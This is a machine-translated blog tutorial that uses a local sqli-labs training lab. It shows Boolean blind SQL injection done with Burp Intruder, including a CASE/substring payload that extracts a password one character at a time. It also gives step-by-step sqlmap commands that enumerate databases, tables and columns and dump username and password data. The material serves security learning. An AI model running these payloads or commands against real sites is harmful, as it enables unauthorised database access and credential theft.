当前位置:网站首页>[tools run SQL blind note]
[tools run SQL blind note]
2022-07-03 04:38:00 【Black zone (rise)】
Catalog
One 、( Tools )burp Running blind injection
1.2、 Method 2 : Injection statement explosion
Two 、( Tools )sqlmap Run Boolean blind injection
First step : Detect whether there is injection
The second step : Burst database name
The third step : Burst database table name
One 、( Tools )burp Running blind injection
1.1、 Method 1 : Blast
After grabbing the bag , Send the request to "Intruder" modular
Set up 2 Payloads
1.2、 Method 2 : Injection statement explosion
Inject construct statements , Iterate
(select case when '§0§' = lower(substring((select password from employees where empid=1),§1§,1)) then 1 else 0 end)
Two 、( Tools )sqlmap Run Boolean blind injection
2.1、 command :
-u Specify injection point
--dbs Run to the library name
--tables Running Watch name
--columns Run field name
--dump Enumerating data
Run out of the corresponding rear , Add... In turn -D Specify the library -T Designated table -C Specified field
2.2、 Use process :
First step : Detect whether there is injection
Basic operation
python sqlmap.py http://localhost:8080/sqli-labs-master/Less-5/?id=1 --batch
--batch Is to use the default settings
In fact, the environment has been swept out
You can add --dbms mysql 了
The second step : Burst database name
command
# Get all databases
sqlmap.py -u url --dbs --batch
---------
# Get the current database
sqlmap.py -u url --current-dbs --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --dbs --batch
The third step : Burst database table name
command
python sqlmap.py -u url -D DB --tables --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security --tables --batch
Step four : Pop field name
command :
sqlmap.py -u url -D DB -T TBL --columns --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users --columns --batch
Step five : Burst data
command :
sqlmap.py -u url -D DB -T TBL -C "COL1,COL2" --dump --batch
Basic operation :
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users -C "username,password" --dump --batch
3、 ... and 、 recommend
【SQL Inject - No echo 】 Bull's blind note : principle 、 function 、 Use process
【SQL Inject - With echo 】DNS Request injection : principle 、 platform 、 Using process 、 To configure
边栏推荐
- 跨境电商多商户系统怎么选
- Web security - CSRF (token)
- C language self-made Games: Sanzi (tic tac toe chess) intelligent chess supplement
- 7. Integrated learning
- Dive Into Deep Learning——2.1数据操作&&练习
- 【工具跑SQL盲注】
- MySQL winter vacation self-study 2022 12 (3)
- Handling record of electric skateboard detained by traffic police
- [software testing-6] & Test Management
- Leetcode simple problem delete an element to strictly increment the array
猜你喜欢

GFS distributed file system (it's nice to meet it alone)

Network security textual research recommendation

2022 P cylinder filling test content and P cylinder filling simulation test questions

How to retrieve the password for opening word files
![[free completion] development of course guidance platform (source code +lunwen)](/img/14/7c1c822bda050a805fa7fc25b802a4.jpg)
[free completion] development of course guidance platform (source code +lunwen)

arthas watch 抓取入参的某个字段/属性

FISCO bcos zero knowledge proof Fiat Shamir instance source code

How to choose cross-border e-commerce multi merchant system

Web security - CSRF (token)

Introduction to message queuing (MQ)
随机推荐
FFMpeg example
Employee attendance management system based on SSM
Ffmpeg mix
JVM原理简介
I've seen a piece of code in the past. I don't know what I'm doing. I can review it when I have time
FISCO bcos zero knowledge proof Fiat Shamir instance source code
商城系统搭建完成后需要设置哪些功能
P35-P41 fourth_ context
金仓数据库KingbaseES 插件kdb_database_link
Arthas watch grabs a field / attribute of the input parameter
Preliminary cognition of C language pointer
Introduction to JVM principle
How to retrieve the password for opening word files
逆袭大学生的职业规划
2022 registration examination for safety production management personnel of hazardous chemical production units and examination skills for safety production management personnel of hazardous chemical
Summary of training competition (Lao Li's collection of questions)
Learning practice: comprehensive application of cycle and branch structure (I)
How do you use lodash linking function- How do you chain functions using lodash?
[BMZCTF-pwn] 18-RCTF-2017-Recho
Dive Into Deep Learning——2.1数据操作&&练习












